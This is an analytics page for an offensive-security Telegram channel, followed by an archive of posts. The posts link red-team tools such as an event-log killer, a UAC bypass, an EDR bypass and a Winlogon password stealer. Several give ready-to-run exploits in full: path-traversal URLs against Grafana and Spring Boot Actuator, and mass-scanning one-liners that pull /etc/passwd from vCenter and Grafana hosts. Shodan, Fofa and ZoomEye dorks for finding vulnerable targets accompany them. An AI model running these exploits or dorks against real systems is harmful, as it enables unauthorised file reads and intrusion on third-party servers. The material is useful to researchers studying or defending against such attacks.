Available now! Telegram Research 2025 β the year's key insights 
APT
Open in Telegram
This channel discusses: β Offensive Security β RedTeam β Malware Research β OSINT β etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat
Show moreπ Analytical overview of Telegram channel APT
Channel APT (@apt_notes) in the English language segment is an active participant. Currently, the community unites 14 682 subscribers, ranking 8 834 in the Technologies & Applications category and 45 554 in the Russia region.
π Audience metrics and dynamics
Since its creation on Π½Π΅Π²ΡΠ΄ΠΎΠΌΠΎ, the project has demonstrated rapid growth, gathering an audience of 14 682 subscribers.
According to the latest data from 13 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 414 over the last 30 days and by 17 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 50.76%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
- Post reach: On average, each post receives 7 449 views. Within the first day, a publication typically gains 0 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 20.
π Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
βThis channel discusses:
β Offensive Security
β RedTeam
β Malware Research
β OSINT
β etc
Disclaimer:
t.me/APT_Notes/6
Chat Link:
t.me/APT_Notes_PublicChatβ
Thanks to the high frequency of updates (latest data received on 14 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
14 682
Subscribers
+1724 hours
+1027 days
+41430 days
Posts Archive
14 682
Grafana β Unauthorized Arbitrary Read File
The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+
Dorks:
Shodan:
title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana
PoC
http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini
The "plugin-id" could be any plugin that exists in the system
One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'
#grafana #lfi #bugbounty #pentest14 682
PowerRunAsAttached
This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window).
Example:
Invoke-RunAsAttached -Username "darkcodersc" -Password "testmepliz"
https://github.com/DarkCoderSc/PowerRunAsAttached
#runas #powershell #pentest #tools14 682
Design Issues Of Modern EDRs: Bypassing ETW-Based Solutions
https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html
#etw #redteam #blueteam #malware
14 682
Rodan Telecom Exploitation Framework
Rodan is a telecom signaling exploitation framework created and maintained by Etisalat Egypt Research Labs (E-Labs). This framework includes a suite of modules that enable users to exploit vulnerabilities in the signaling protocols used by mobile operators. Rodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP.
https://github.com/Etisalat-Egypt/Rodan
#telecom #ss7 #gtp #sip
14 682
Phant0m β Windows Event Log Killer
Phant0m targets the Event Log service and finding the process responsible for the Event Log service, it detects and kills the threads responsible for the Event Log service. Thus, while the Event Log service appears to be running in the system (because Phant0m didn't kill process), it does not actually run (because Phant0m killed threads) and the system does not collect logs.
https://github.com/hlldz/Phant0m
#windows #events #log #killer
14 682
UAC bypass - DLL hijacking
This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.
https://github.com/SecuProject/DLLHijackingScanner
#uac #bypass #dll #hijacking
14 682
jq + grep + fzf + curl = SharpCollection
https://github.com/Flangvik/SharpCollection
alias SharpCollection='print -z `curl -sSL "https://api.github.com/repos/Flangvik/SharpCollection/git/trees/master?recursive=1" | jq -r ".tree[].path" | grep \\.exe | while read line; do echo "curl -sSL https://github.com/Flangvik/SharpCollection/raw/master/$line >"; done | fzf --tac`'#csharp #collection #tooling
14 682
KeyHacks
Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
https://github.com/streaak/keyhacks
#api #key #check #bugbounty
14 682
Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver (CVE-2021-42008)
CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access.
https://syst3mfailure.io/sixpack-slab-out-of-bounds
#linux #6pack #lpe #cve
14 682
OffensiveNim β PowerShell
Using Nim to load the CLR and execute PowerShell without the need for PowerShell.exe, now with printing the output as well!
https://github.com/Alh4zr3d/OffensiveNim/blob/master/src/execute_powershell_bin.nim
#offensive #nim #powershell
14 682
Webapp Wordlists
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.
https://github.com/p0dalirius/webapp-wordlists
#wordlist #cms #bugbounty
14 682
VMware vCenter (7.0.2.00100) β File Read + SSRF + XSS
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done
Shodan Dorks:
http.title:"ID_VC_Welcome"
Zoomeye Dorks:
app:"VMware vCenter"
https://github.com/l0ggg/VMware_vCenter
#vmware #vcenter #bugbounty14 682
Spring Boot Actuator β Logview Directory Traversal (CVE-2021-21234)
http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../Details: https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/ #spring #actuator #cve #bugbounty
14 682
CHAPS β Configuration Hardening Assessment PowerShell Script
CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment.
https://github.com/cutaway-security/chaps
#powershell #hardening #assessment #blueteam
14 682
ManageEngine ADSelfService Plus β Authentication Bypass (CVE-2021-40539)
Details:
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
Exploit:
https://github.com/synacktiv/CVE-2021-40539
#adselfservice #cve #auth #bypass
14 682
How Windows Stops Kerberos Usernames Being Case Sensitive
https://vbscrub.com/2021/11/29/how-windows-stops-kerberos-usernames-being-case-sensitive/
#kerberos #pre_auth #aes_salt
14 682
COM Objects P.1: The Hidden Backdoor in Your System
A deeper dive into COM objects: how to utilize them in redteam engagements, and how to detect and protect organizations from them if you are on the blueteam side.
https://medium.com/maltrak/com-objects-p-1-the-hidden-backdoor-in-your-system-947ac4285e85
#com #backdoor #redteam #blueteam
14 682
DetectionLabELK
DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.
https://github.com/cyberdefenders/DetectionLabELK
#blueteam #detection #elk #lab
14 682
Winlogon Password Leaking
The flow is:
β user enters password
β winlogon loads mpnotify.exe
β mpnotify opens RPC channel
β winlogon sends pass via RPC
β mpnotify forwards to DLL
β DLL stores it on disk
https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
#winlogon #password #leak #redteam
